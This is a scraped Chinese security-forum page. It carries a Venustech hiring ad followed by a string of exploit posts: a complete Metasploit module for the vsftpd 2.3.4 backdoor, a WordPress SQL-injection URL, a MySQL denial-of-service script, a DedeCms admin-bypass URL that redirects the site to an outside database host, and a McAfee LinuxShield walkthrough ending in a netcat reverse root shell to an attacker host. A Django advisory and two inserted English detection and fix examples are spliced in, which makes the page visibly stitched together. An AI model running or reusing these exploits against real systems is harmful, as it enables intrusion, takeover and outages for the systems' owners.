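[Recruitment] [Hiring] 启明星辰 (Venustech) R&D Recruitment

  • Position: Other
  • Company: 启明星辰 (Venustech)
  • Location: Beijing
  • Major required: Other
  • Education required: Bachelor's degree
  • Work experience: 2+ years
  • Salary: Negotiable
  • Age requirement: None
  • Gender requirement: None
  • Company website: http://www.venustech.com.cn
  • Résumé e-mail: xiaoyan@sitedirsec.com
  • Phone: 00000000000
  • Online QQ:
  • Security assistant: Recruit or look for jobs through the 非安全中国 administrators, QQ group: 57116771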


  • ++++++++++ Notes on 启明星辰 ++++++++++

    Just send me a private message on the site.

    I. R&D Center: Linux C Software Engineer (several openings)

    Responsibilities:

    1. Develop and maintain software for embedded devices such as security gateways, firewalls and IPS

    Requirements:

    1. Proficient in C programming
    2. Skilled with the Linux operating system; proficient in C programming on Linux
    3. Proficient in TCP/IP and other network protocols; familiar with application-layer protocols and protocol analysis
    4. Familiar with network security protocols and with security devices such as routers, switches and firewalls
    5. Familiar with the Linux kernel and kernel development

    II. R&D Center: Test Engineer (several openings)

    Responsibilities:

    1. System testing and integration testing of products
    2. Writing, executing and revising product test cases
    3. Product performance testing
    4. Support and testing for external projects

    Requirements:

    1. Basic TCP/IP knowledge
    2. Solid data-communications fundamentals
    3. Some grounding in Linux
    4. Able to set up and use databases
    5. Familiar with at least one programming language: C/Perl/VBS/TCL
    6. Familiar with test case design, system testing and stress testing
    7. Familiar with firewall principles, with some understanding of firewall features
    8. Some understanding of how network security devices are deployed in a network
    9. Able to use test tools: Loadrunner, packet analysis software, Spirent or IXIA testers

    III. R&D Center: Security Event Engineer (several openings)

    Responsibilities:

    1. Delivery of Trojan detection services and web vulnerability scanning services
    2. Technical support for service customers
    3. Research on web-page Trojans, web vulnerabilities, worms, scanning, denial of service, buffer overflows, etc.
    4. Routine updates and maintenance of the security event libraries for IDS/IPS/UTM/TDS/WAG/322 and other products
    5. Research on attack techniques; research on the TCP/IP protocols; research on reverse engineering

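    非安全中国 disclaimer:
    1. All statements and images in this thread are solely the personal opinions of the poster and do not represent the position of this site;
    2. This topic was posted by 小妍; the poster 小妍 complies with the six management rules of the "Copyright and Disclaimer" statement and enjoys the related rights;
    3. Other organizations or individuals must obtain the consent of the poster 小妍 and of this site before using, reposting or quoting this thread;
    4. Parts of this thread are reposted from other media and published on this site to convey more information; this does not mean that this site endorses the views expressed or is responsible for their accuracy;
    5. If this thread infringes your site's or your personal copyright, please notify this site immediately; it will be removed promptly, with our sincerest apologies;
    6. The administrators and moderators of this site have the right to delete this post without notifying the poster in advance.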

    VSFTPD v2.3.4 Backdoor Command Execution Vulnerability

    ##
    # $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'VSFTPD v2.3.4 Backdoor Command Execution',
          'Description'    => %q{
              This module exploits a malicious backdoor that was added to the VSFTPD download
              archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between
              June 30th 2011 and July 1st 2011 according to the most recent information
              available. This backdoor was removed on July 3rd 2011.
          },
          'Author'         => [ 'hdm', 'mc' ],
          'License'        => MSF_LICENSE,
          'Version'        => '$Revision: 13099 $',
          'References'     =>
            [
              [ 'URL', 'http://pastebin.com/AetT9sS5'],
              [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/_(remove when using_)alert-vsftpd-download-backdoored.html' ],
            ],
          'Privileged'     => true,
          'Platform'       => [ 'unix' ],
          'Arch'           => ARCH_CMD,
          'Payload'        =>
            {
              'Space'       => 2000,
              'BadChars'    => '',
              'DisableNops' => true,
              'Compat'      =>
                {
                  'PayloadType'    => 'cmd_interact',
                  'ConnectionType' => 'find'
                }
            },
          'Targets'        =>
            [
              [ 'Automatic', { } ],
            ],
          'DisclosureDate' => 'Jul 3 2011',
          'DefaultTarget'  => 0))

        register_options([ Opt::RPORT(21) ], self.class)
      end

      def exploit

        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_status("The port used by the backdoor bind listener is already open")
          handle_backdoor(nsock)
          return
        end

        # Connect to the FTP service port first
        connect

        banner = sock.get_once(-1, 30).to_s
        print_status("Banner: #{banner.strip}")

        sock.put("USER #{rand_text_alphanumeric(rand(6)+1)}:)\r\n")
        resp = sock.get_once(-1, 30).to_s
        print_status("USER: #{resp.strip}")

        if resp =~ /^530 /
          print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
          disconnect
          return
        end

        if resp !~ /^331 /
          print_error("This server did not respond as expected: #{resp.strip}")
          disconnect
          return
        end

        sock.put("PASS #{rand_text_alphanumeric(rand(6)+1)}\r\n")

        # Do not bother reading the response from password, just try the backdoor
        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_good("Backdoor service has been spawned, handling...")
          handle_backdoor(nsock)
          return
        end

        disconnect

      end

      def handle_backdoor(s)

        s.put("id\n")

        r = s.get_once(-1, 5).to_s
        if r !~ /uid=/
          print_error("The service on port 6200 does not appear to be a shell")
          disconnect(s)
          return
        end

        print_good("UID: #{r.strip}")

        s.put("nohup " + payload.encoded + " >/dev/null 2>&1")
        handler(s)
      end

    end

    Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow it.
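Detection logic for the behaviour the module above relies on, as an added example that is not part of the original post or of Metasploit: it flags FTP `USER` commands whose name contains `:)` and correlates them with a following connection to tcp/6200. The `Event` record shape, the 60-second window and the sample events are constructed for illustration.

```python
"""Flag the vsftpd 2.3.4 backdoor trigger and the follow-up connect to port 6200."""
import re
from collections import namedtuple

# Hypothetical record shape for this example: one entry per observed FTP
# control-channel line (data set) or TCP connection attempt (data is None).
Event = namedtuple("Event", "ts src dst dport data")

FTP_PORT = 21
BACKDOOR_PORT = 6200      # bind-listener port used by the module above
WINDOW_SECONDS = 60       # assumed correlation window, tune for your sensor

USER_RE = re.compile(rb"^USER\s+(.+?)\s*$", re.IGNORECASE)


def is_trigger(line):
    """True if the line is an FTP USER command whose name contains ':)'."""
    m = USER_RE.match(line)
    return bool(m) and b":)" in m.group(1)


def detect(events):
    """Return (kind, ts, src, dst) findings in time order.

    'trigger'       : USER command carrying the smiley was sent to an FTP server
    'shell-connect' : connection to tcp/6200 on that server within the window
    """
    findings = []
    pending = {}  # server address -> timestamp of the last trigger seen
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.dport == FTP_PORT and ev.data and is_trigger(ev.data):
            pending[ev.dst] = ev.ts
            findings.append(("trigger", ev.ts, ev.src, ev.dst))
        elif ev.dport == BACKDOOR_PORT and ev.dst in pending:
            if ev.ts - pending[ev.dst] <= WINDOW_SECONDS:
                findings.append(("shell-connect", ev.ts, ev.src, ev.dst))
    return findings


# Constructed sample events (documentation address ranges, arbitrary timestamps).
SAMPLE = [
    Event(100, "198.51.100.7", "192.0.2.10", 21, b"USER alice\r\n"),
    Event(130, "203.0.113.9", "192.0.2.10", 21, b"USER a1B2:)\r\n"),
    Event(131, "203.0.113.9", "192.0.2.10", 21, b"PASS x9\r\n"),
    Event(132, "203.0.113.9", "192.0.2.10", 6200, None),
    Event(900, "198.51.100.7", "192.0.2.10", 6200, None),  # outside the window
]

if __name__ == "__main__":
    for finding in detect(SAMPLE):
        print(finding)
```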

    WordPress Event List Plugin <= 0.7.8 - SQL Injection Vulnerability

    1. Description:

    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    allows an authenticated user to execute arbitrary SQL commands via the id
    parameter to wp-admin/admin.php.

    2. Proof of Concept:

    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(10)

    3. Solution:

    The plugin has been removed from WordPress. Deactivate the plug-in and wait
    for a hotfix.

    4. Reference:

    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429

    MySQL 5.5.8 Remote Denial of Service Vulnerability

    import socket, sys

    print "\n"
    print "----------------------------------------------------------------"
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"
    print "| Level Smash the Stack                                         |"
    print "----------------------------------------------------------------"
    print "\n"

    buf=("&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00")

    buf2=("\x11\x00\x00\x00\x03set autocommit30")

    def usage():
        print "usage : ./mysql.py <victim_ip>"
        print "example: ./mysql.py 192.168.1.22"

    def main():
        if len(sys.argv) != 2:
            usage()
            sys.exit()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        HOST = sys.argv[1]
        PORT = int(3306)
        s.connect((HOST,PORT))
        print "[*] Connect"
        s.send(buf)
        print "[*] Payload 1 sent"
        s.send(buf2)
        print "[*] Payload 2 sent\n", "[*] Run again to ensure it is down..\n"
        s.close()

    if __name__ == "__main__":
        main()

    Step-by-Step Linux Installation Guide: Setting Up the Virtual Machine

    http://www.sitedir.com.cn/video/4.swf

    DedeCms (织梦) v5.6-5.7 Unauthorized Access Vulnerability

    http://www.XXXX.com/[DedeCms admin directory]/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

    Change validate=dcug above to the current CAPTCHA value and you get straight into the site's admin backend.

    This vulnerability can only be used if the admin backend path is known.

    Official temporary fix:

    Find the file include/common.inc.php and replace:

        foreach($_REQUEST as $_k=>$_v)
        {
            var_dump($_k);
            if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
            {
                exit('Request var not allow!');
            }
        }

    with:

        // Check and register externally submitted variables
        function CheckRequest(&$val) {
            if (is_array($val)) {
                foreach ($val as $_k=>$_v) {
                    CheckRequest($_k);
                    CheckRequest($val[$_k]);
                }
            } else
            {
                if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
                {
                    exit('Request var not allow!');
                }
            }
        }
        CheckRequest($_REQUEST);
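The difference between the two filters in the DedeCms post above, modelled in Python as an added example (not DedeCms code and not part of the original post). `php_parse` is a simplified stand-in for the way PHP expands bracketed parameter names into nested arrays; the query strings and the host name in them are constructed.

```python
"""Compare the flat key check with the recursive CheckRequest on nested parameters."""
import re
from urllib.parse import parse_qsl

FORBIDDEN = re.compile(r"^(cfg_|GLOBALS)")   # same pattern as the PHP filters
NAME_RE = re.compile(r"^([^\[]+)((?:\[[^\]]*\])*)$")


def php_parse(query):
    """Turn 'a[b][c]=v' style names into nested dicts (simplified PHP behaviour)."""
    root = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        m = NAME_RE.match(name)
        if not m:                      # malformed brackets: keep the raw name
            root[name] = value
            continue
        keys = [m.group(1)] + re.findall(r"\[([^\]]*)\]", m.group(2))
        node = root
        for key in keys[:-1]:
            if not isinstance(node.get(key), dict):
                node[key] = {}
            node = node[key]
        node[keys[-1]] = value
    return root


def old_check(request):
    """Original filter: tests only the top-level parameter names."""
    return not any(k and FORBIDDEN.match(k) for k in request)


def check_request(val):
    """Replacement filter: recurses into arrays, tests every key and scalar value."""
    if isinstance(val, dict):
        return all(check_request(k) and check_request(v) for k, v in val.items())
    return not (len(val) > 0 and FORBIDDEN.match(val))


# Constructed inputs. Each check returns True when the request is let through.
NESTED = "dopost=login&_POST[GLOBALS][cfg_dbhost]=db.example.invalid"
FLAT = "dopost=login&cfg_dbhost=db.example.invalid"
BENIGN = "dopost=login&userid=admin"
VALUE = "q=cfg_basehost"   # forbidden prefix in a value, not in a name

if __name__ == "__main__":
    for label, query in [("nested", NESTED), ("flat", FLAT),
                         ("benign", BENIGN), ("value", VALUE)]:
        req = php_parse(query)
        print(label, "old:", old_check(req), "new:", check_request(req))
```

The nested case passes the old filter because its only top-level names are `dopost` and `_POST`; the recursive version reaches the `GLOBALS` key one level down. The last case shows a side effect of the replacement: any scalar value that begins with `cfg_` or `GLOBALS` is rejected as well.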

    Step-by-Step Linux Installation Guide: Setting Up the Virtual Machine Tools

    http://www.sitedir.com.cn/video/8.swf

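    Multiple Security Vulnerabilities in the Django Development Framework
    Published: 2011-09-12

    Affected versions:
    Django 1.2.5
    Django 1.3 beta 1
    Django 1.2.4
    Django 1.2.2
    Django 1.2

    Vulnerability description:

    Django is an open-source web application framework written in Python.
    Django has multiple security vulnerabilities that allow attackers to obtain sensitive information, manipulate data, carry out cache poisoning attacks or cause a denial of service.
    1) When a cache backend is used, django.contrib.sessions handles sessions incorrectly, which can be exploited to manipulate session information. Successful exploitation requires a known session key and an application that lets the attacker store dictionary-like objects in the cache under a valid session key.
    2) The Django model system includes a field type, URLField, that validates whether a supplied value is a valid URL; if the boolean keyword argument verify_exists is true, it attempts to verify the supplied URL and resolve it. By default the underlying socket has no timeout, so an attacker can use this to send crafted URLs that consume all server memory and cause a denial of service.
    3) There is an error in the handling of redirect responses when validating URLs supplied to the "URLField" field type; an attacker can use it to return a redirect response to a "file://" URL and so determine whether local files exist on the server.
    4) There is an error in the handling of the "X-Forwarded-Host" HTTP header when generating full-path URLs for redirect responses; an attacker can use it for cache poisoning attacks.

    Details:
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    http://secunia.com/advisories/45939/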

    McAfee LinuxShield Local/Remote Code Execution Vulnerability
    McAfee LinuxShield remote/local code
    Affected versions: McAfee LinuxShield <= 1.5.1
    Remote attack: Yes
    Local overflow: Yes

    Background:
    ===========

    LinuxShield detects and removes viruses and other potentially unwanted
    software on Linux-based systems. LinuxShield uses the powerful McAfee
    scanning engine - the engine common to all our
    anti-virus products.

    Although a few years ago, the Linux operating system was considered a
    secure environment, it is now seeing more occurrences of software
    specifically written to attack or exploit security weaknesses in
    Linux-based systems. Increasingly, Linux-based systems interact with
    Windows-based computers. Although viruses written to attack Windows-
    based systems do not directly attack Linux systems, a Linux server
    can harbor these viruses, ready to infect any client that connects to
    it.

    When installed on your Linux systems, LinuxShield provides protection
    against viruses, Trojan horses, and other types of potentially
    unwanted software.

    LinuxShield scans files as they are opened and closed - a technique
    known as on-access scanning. LinuxShield also incorporates an
    on-demand scanner that enables you to scan any directory or file in
    your host at any time.

    When kept up-to-date with the latest virus-definition (DAT) files,
    LinuxShield is an important part of your network security. We
    recommend that you set up an anti-virus security policy for your
    network, incorporating as many protective measures as possible.

    LinuxShield uses a web-browser interface, and a large number of
    LinuxShield installations can be centrally controlled by ePolicy
    Orchestrator.

    (Product description from LinuxShield Product Guide)

    Description:
    ============

    This vulnerability allows remote attackers to execute arbitrary code
    on vulnerable installations of McAfee LinuxShield. User interaction
    is not required to exploit this vulnerability but an attacker must
    be authenticated.

    The LinuxShield Webinterface communicates with the locally installed
    "nailsd" daemon, which listens on port 65443/tcp, to do configuration
    changes, query the configuration and execute tasks.

    Each user, which can login to the victim box, can also authenticate
    itself to the "nailsd" and can do configuration changes and execute
    tasks with root privileges.

    A direct execution of commands is not possible, but it is possible to
    download and execute code through manipulation of the config and
    execute schedule tasks of the LinuxShield.

    walk-through (after the TLS handshake):
    +--------------------------------------

    nailsd > +OK welcome to the NAILS Statistics Service
    attacker> auth <user> <pass>
    nailsd > +OK successful authentication

    # Set the Attacker repository to download our code from a httpd
    # (catalog.z)
    #---------------------------------------------------------------
    attacker> db set 1 _table=repository status=1 siteList=<?xml version="1.0" encoding="UTF-8"?><ns:SiteLists xmlns:ns="naSiteList" GlobalVersion="20030131003110" LocalVersion="20091209161903" Type="Client"><SiteList Default="1" Name="SomeGUID"><HttpSite Type="repository" Name="EvilRepo" Order="1" Server="<attackerhost>:80" Enabled="1" Local="1"><RelativePath>nai</RelativePath><UseAuth>0</UseAuth><UserName></UserName><Password Encrypted="0"/></HttpSite></SiteList></ns:SiteLists> _cmd=update
    nailsd > +OK database changes buffered.

    # Execute task to set the attacker repository
    #---------------------------------------------------------------
    attacker> task setsitelist
    nailsd > +OK setting sitelist from CMA.

    # Execute the default Update task to download the code
    #---------------------------------------------------------------
    attacker> task nstart LinuxShield Update
    nailsd > +OK task LinuxShield Update starting

    # Create a Scan profile, which executes our code. The profiles are
    # not stored in the database.
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    #---------------------------------------------------------------
    attacker> sconf ODS_99 begin
    nailsd > +OK 1260400888

    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
    # where our earlier downloaded catalog.z file is stored.
    # (/opt/McAfee/cma/scratch/update/catalog.z)
    #---------------------------------------------------------------
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
    true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
    DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
    10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
    ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
    file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
    ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
    ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
    .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
    e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
    .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
    le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
    dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
    e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
    ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
    o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
    .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
    rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
    ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
    00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
    ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
    ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
    nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
    ofile.ODS_99.filter.extensions.type=extension nailsd.profil
    e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
    .action.Default.secondary=Quarantine nailsd.profile.ODS_99.
    action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
    econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
    ss nailsd.profile.ODS_99.action.error=Block
    nailsd > +OK configuration changes buffered
    attacker> sconf ODS_99 commit 1260400888
    nailsd > +OK configuration changes stored

    # Set a scan task with the manipulated profile to execute the code
    #---------------------------------------------------------------
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
    pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    mp;exclude:false timetable=type=unscheduled taskResults=0 i
    _lastRun=1260318482 status=Stopped _cmd=insert
    nailsd > +OK database changes buffered

    # Execute scan task to execute the code
    #---------------------------------------------------------------
    attacker> task nstart Evil Task

    +-------------------------------------- walk-through EOF

    To get a reverse root shell place something like this in the catalog.z

    --- snip ---
    #!/bin/sh
    nc -nv <attacker_host> 4444 -e /bin/sh
    --- /snip ---

    Proof of Concept :
    ==================

    http://inj3ct0r.com/sploits/11165.tar.gz

    Solution:
    =========

    McAfee Advisory
    +--------------
    https://kc.mcafee.com/corporate/index?page=content&id=SB10007

    Disclosure Timeline (YYYY/MM/DD):
    =================================

    2009.12.07: Vulnerability found
    2010.02.03: Asked vendor for a PGP key
    2010.02.05: Vendor sent his PGP key
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
    date (2010.02.18) to Vendor
    2010.02.05: Vendor acknowledges the reception of the advisory
    2010.02.16: Ask for a status update, because the planned release date is
    2010.02.18.
    2010.02.16: Vendor response that, they are currently working on a patch
    2010.02.17: Changed release date to 2010.02.25.
    2010.02.22: Vendor gives a status update, that they are able to release
    the patch on 2010.02.25.
    2010.02.24: Ask for a list of affected products and the advisory url.
    2010.02.24: Vendor sends the list.
    2010.03.02: Release of this Advisory
